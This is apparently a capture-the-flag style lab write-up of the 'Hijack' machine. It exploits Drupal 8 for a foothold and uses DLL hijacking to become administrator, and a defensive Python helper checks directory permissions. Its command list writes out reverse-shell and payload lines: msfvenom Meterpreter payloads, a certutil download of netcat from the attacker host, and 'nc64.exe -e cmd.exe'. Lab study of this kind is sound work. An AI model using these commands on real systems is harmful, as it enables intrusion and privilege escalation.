Premise
In this post, we demonstrate basic exploitation of the Drupal content management system to gain a limited shell on the remote host. We then escalate our privileges by generating a custom DLL payload and replacing the target DLL file with it. The lab machine used is called ‘Hijack’.
Machine Name: Hijack
Difficulty: Beginner
Skills Learned
- Drupal
- OWASP
- DLL Injection
Finding the Way In
I started by running an Nmap scan, which revealed a web server running Drupal 8. I checked the robots.txt file for any interesting directories and then headed over to the main page. I found a login page, but instead of trying to brute-force my way in, I decided to look for a more elegant solution.
I knew that Drupal 8 had several publicly known remote code execution vulnerabilities, so I searched for an exploit and found a Bash script that looked promising. The script was designed to echo a simple message to a file, but I modified it to download and execute a reverse shell payload from my machine.
After a bit of trial and error with different payloads, I was able to use the exploit to download Netcat to the target machine and then use it to get a reverse shell. I now had a foothold on the machine, but I was still just a regular user.
Becoming the Admin
My next goal was to become the administrator. I started by enumerating the services running on the machine and found one called “hijack.” The name was a dead giveaway, so I decided to investigate it further.
I checked the permissions on the service’s executable file and found that I didn’t have write access. However, I did have write access to the “libraries” directory where the service stored its DLL files. This was the perfect opportunity for a DLL hijacking attack.
I used msfvenom to create a malicious DLL file with a Meterpreter payload and named it custom.dll to match the name of one of the legitimate DLLs. I then downloaded my malicious DLL into the “libraries” directory, overwriting the original file.
All that was left to do was start the “hijack” service. As soon as I did, the service loaded my malicious DLL, which executed my payload and gave me a Meterpreter session with full administrator privileges! 👑
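The writable-directory check from this section, seen from the defender's side: the Python helper below is an added example, not part of the original writeup, that parses the output of icacls <DIRECTORY> and flags ACEs giving broad groups (Everyone, Users, Authenticated Users) write-capable rights on a directory a service loads DLLs from. The directory path and the icacls output are constructed samples, not captured from the lab.

```python
import re

# icacls rights that let a principal create, replace or take control of files
# (F=full, M=modify, W=write, WD=write data/add file, AD=append/add subdir,
# DC=delete child, WDAC=write DACL, WO=write owner).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO"}
# Inheritance/scope markers that icacls prints in the same parentheses.
ACE_FLAGS = {"I", "OI", "CI", "IO", "NP", "DENY"}
# Principals that every low-privileged local user is a member of.
BROAD_PRINCIPALS = {"Everyone", "BUILTIN\\Users",
                    "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\INTERACTIVE"}
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<parts>(?:\([^)]*\))+)$")

def parse_icacls(output, path):
    """Yield (principal, flags, rights) per ACE; `path` is the queried directory,
    passed in so paths containing spaces need not be split heuristically."""
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):          # first line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:                          # blank or summary line
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group("parts"))
        tokens = {t.strip().upper() for g in groups for t in g.split(",")}
        yield m.group("principal"), tokens & ACE_FLAGS, tokens - ACE_FLAGS

def broad_write_access(output, path, broad=BROAD_PRINCIPALS):
    """Return [(principal, write rights)] for allow ACEs granting a broad
    principal write-capable access to the directory; deny ACEs are skipped."""
    findings = []
    for principal, flags, rights in parse_icacls(output, path):
        if "DENY" in flags or principal not in broad:
            continue
        hit = sorted(rights & WRITE_RIGHTS)
        if hit:
            findings.append((principal, hit))
    return findings

# Constructed `icacls C:\hijack\libraries` output (not captured from the lab):
SAMPLE = r"""C:\hijack\libraries BUILTIN\Administrators:(I)(OI)(CI)(F)
                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                    BUILTIN\Users:(I)(OI)(CI)(M)
                    Everyone:(OI)(CI)(Rc,S,RA,WD,AD)

Successfully processed 1 files; Failed processing 0 files"""

if __name__ == "__main__":
    for who, rights in broad_write_access(SAMPLE, r"C:\hijack\libraries"):
        print(f"{who} can write to the DLL directory via {','.join(rights)}")
```

A clean result for a service's DLL directory is an empty list; anything returned is a DLL hijacking exposure to fix by removing the write rights or moving the directory under a protected path.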
Commands I Used
Here are some of the key commands I used during this process:
- Searching for exploits:
searchsploit drupal 8
- Generating a Meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o win.exe
- Starting a Python web server:
python -m http.server
- Downloading a file with certutil:
certutil.exe -urlcache -f http://<IP>:<PORT>/nc64.exe nc64.exe
- Setting up a Netcat listener:
nc -lvp <PORT>
- Getting a reverse shell with Netcat:
nc64.exe -e cmd.exe <IP> <PORT>
- Checking file permissions:
icacls <DIRECTORY>
- Generating a malicious DLL:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o custom.dll
- Starting a service:
sc start hijack